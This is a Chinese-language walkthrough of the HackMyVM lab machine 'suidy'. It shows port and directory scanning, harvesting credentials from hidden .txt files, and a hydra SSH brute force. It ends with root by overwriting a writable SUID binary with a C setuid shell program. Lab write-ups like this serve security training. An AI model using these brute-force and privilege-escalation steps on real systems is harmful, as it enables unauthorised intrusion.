hack-my-vm-suidy

hack-my-vm-suidy

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
kali@kali [~] ➜  sudo nmap -sT -p- --min-rate 1000 192.168.1.103                 [18:58:56]
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-15 18:59 CST
Nmap scan report for 192.168.1.103
Host is up (0.0016s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:B3:E6:17 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 10.28 seconds

深度扫描一下吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
kali@kali [~] ➜  sudo nmap -sT -sC -sV -O -p22,80 192.168.1.103                                                                                  [18:59:19]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-15 19:00 CST
Nmap scan report for 192.168.1.103
Host is up (0.00056s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 8a:cb:7e:8a:72:82:84:9a:11:43:61:15:c1:e6:32:0b (RSA)
|   256 7a:0e:b6:dd:8f:ee:a7:70:d9:b1:b5:6e:44:8f:c0:49 (ECDSA)
|_  256 80:18:e6:c7:01:0e:c6:6d:7d:f4:d2:9f:c9:d0:6f:4c (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:B3:E6:17 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.35 seconds

80端口渗透

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
kali@kali [~] ➜  sudo dirsearch -u http://192.168.1.103                                                                                          [19:00:48]
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/reports/http_192.168.1.103/_25-02-15_19-00-52.txt

Target: http://192.168.1.103/

[19:00:52] Starting: 
[19:01:53] 200 -  362B  - /robots.txt

Task Completed

访问robots.txt去看看

1
2
3
4
5
kali@kali [~] ➜  curl http://192.168.1.103/robots.txt                                                                                            [19:02:11]
/hi
/....\..\.-\--.\.-\..\-.

/shehatesme

这上面最后一个目录藏得还挺隐蔽的,我们去访问一下吧

1

这里的意思是让我们扫面网站呗,后缀是.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
kali@kali [~] ➜  gobuster dir --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.1.103/shehatesme/ -x txt [19:05:11]
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.103/shehatesme/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/full.txt             (Status: 200) [Size: 16]
/about.txt            (Status: 200) [Size: 16]
/search.txt           (Status: 200) [Size: 16]
/privacy.txt          (Status: 200) [Size: 16]
/blog.txt             (Status: 200) [Size: 16]
/new.txt              (Status: 200) [Size: 16]
/page.txt             (Status: 200) [Size: 16]
/forums.txt           (Status: 200) [Size: 16]
/jobs.txt             (Status: 200) [Size: 16]
/other.txt            (Status: 200) [Size: 16]
/welcome.txt          (Status: 200) [Size: 16]
/admin.txt            (Status: 200) [Size: 16]
/faqs.txt             (Status: 200) [Size: 16]
/2001.txt             (Status: 200) [Size: 16]
/link.txt             (Status: 200) [Size: 16]
/space.txt            (Status: 200) [Size: 16]
/network.txt          (Status: 200) [Size: 16]
/google.txt           (Status: 200) [Size: 16]
/folder.txt           (Status: 200) [Size: 16]
/java.txt             (Status: 200) [Size: 16]
/issues.txt           (Status: 200) [Size: 16]
/guide.txt            (Status: 200) [Size: 16]
/es.txt               (Status: 200) [Size: 16]
/art.txt              (Status: 200) [Size: 16]
/smilies.txt          (Status: 200) [Size: 16]
/airport.txt          (Status: 200) [Size: 16]
/secret.txt           (Status: 200) [Size: 16]
/procps.txt           (Status: 200) [Size: 16]
/pynfo.txt            (Status: 200) [Size: 16]
/lh2.txt              (Status: 200) [Size: 16]
/muze.txt             (Status: 200) [Size: 16]
/alba.txt             (Status: 200) [Size: 16]
/cymru.txt            (Status: 200) [Size: 16]
/wha.txt              (Status: 200) [Size: 16]
Progress: 441122 / 441124 (100.00%)
===============================================================
Finished
===============================================================

挨个访问,然后把用户名和密码集中起来,直接爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
kali@kali [~] ➜  cat user                                                                                                                        [19:12:39]
yuijhse
jaime11
hidden1
jhfbvgt
maria11
john765
mmnnbbv
smileys
nhvjguy
theuser
kali@kali [~] ➜  cat passwd                                                                                                                      [19:12:43]
hjupnkk
JKiufg6
passZZ!
iugbnvh
jhfgyRf
FDrhguy
iughtyr
98GHbjh
kjhgyut
thepass
kali@kali [~] ➜  hydra -L user -P passwd -t 32 ssh://192.168.1.103                                                                               [19:13:29]

Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-15 19:14:31
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 32 tasks per 1 server, overall 32 tasks, 100 login tries (l:10/p:10), ~4 tries per task
[DATA] attacking ssh://192.168.1.103:22/
[22][ssh] host: 192.168.1.103   login: theuser   password: thepass
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-15 19:14:48

直接远程登录

提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
kali@kali [~] ➜  ssh theuser@192.168.1.103                                                                                                       [19:14:48]
theuser@192.168.1.103's password: 
Linux suidy 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Feb 15 09:37:39 2025 from 192.168.1.4
theuser@suidy:~$ ls
user.txt
theuser@suidy:~$ cat user.txt |base64
SE1WMjM1M0lWSQo=
theuser@suidy:~$

直接跑linpeas和pspy

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
theuser@suidy:/tmp$ ./pspy64 
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2025/02/15 12:17:51 CMD: UID=0     PID=1      | /sbin/init 
2025/02/15 12:18:01 CMD: UID=0     PID=1125   | /usr/sbin/CRON -f 
2025/02/15 12:18:01 CMD: UID=0     PID=1126   | /usr/sbin/CRON -f 
2025/02/15 12:18:01 CMD: UID=0     PID=1127   | /bin/sh -c sh /root/timer.sh 
2025/02/15 12:18:01 CMD: UID=0     PID=1128   | sh /root/timer.sh 
2025/02/15 12:19:01 CMD: UID=0     PID=1129   | /usr/sbin/CRON -f 
2025/02/15 12:19:01 CMD: UID=0     PID=1130   | /usr/sbin/CRON -f 
2025/02/15 12:19:01 CMD: UID=0     PID=1131   | /bin/sh -c sh /root/timer.sh 
2025/02/15 12:19:01 CMD: UID=0     PID=1132   | sh /root/timer.sh

发现呢,是存在一个经常执行的文件的timer.sh但是这文件在root目录下,我么没有权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strace Not Found
You can write SUID file: /home/suidy/suidyyyyy
-rwsr-xr-x 1 root root 63K ene 10  2019 /usr/bin/su
-rwsr-xr-x 1 root root 35K ene 10  2019 /usr/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 51K ene 10  2019 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 83K jul 27  2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 53K jul 27  2018 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 44K jul 27  2018 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 63K jul 27  2018 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 44K jul 27  2018 /usr/bin/chsh
-rwsr-xr-- 1 root messagebus 50K jun  9  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 427K ene 31  2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10K mar 28  2017 /usr/lib/eject/dmcrypt-get-device

看来就是suidyyyyy文件了,我们有可以写入的权限

1
2
theuser@suidy:/home/suidy$ file suidyyyyy 
suidyyyyy: setuid, setgid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=1be0c4949efc74fe829196ecb3ac6e9c0b642986, not stripped

是一个二进制文件,那我们直接搞一个提权的二进制文件对这个文件进行覆盖,利用suid就可以直接提权了

1
2
3
4
5
6
7
8
9
10
11
12
13
theuser@suidy:/tmp$ nano  1.c
theuser@suidy:/tmp$ cat 1.c 
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h> 
int main() {        
    setuid(0);
    setgid(0);
    system("/bin/bash");
}
theuser@suidy:/tmp$ gcc 1.c -o 1
theuser@suidy:/tmp$ cp 1 /home/suidy/suidyyyyy 
theuser@suidy:/tmp$ 
1
2
3
4
5
theuser@suidy:/home/suidy$ ./suidyyyyy 
root@suidy:/home/suidy# id
uid=0(root) gid=0(root) grupos=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(theuser)
root@suidy:/home/suidy# whoami
root

拿下了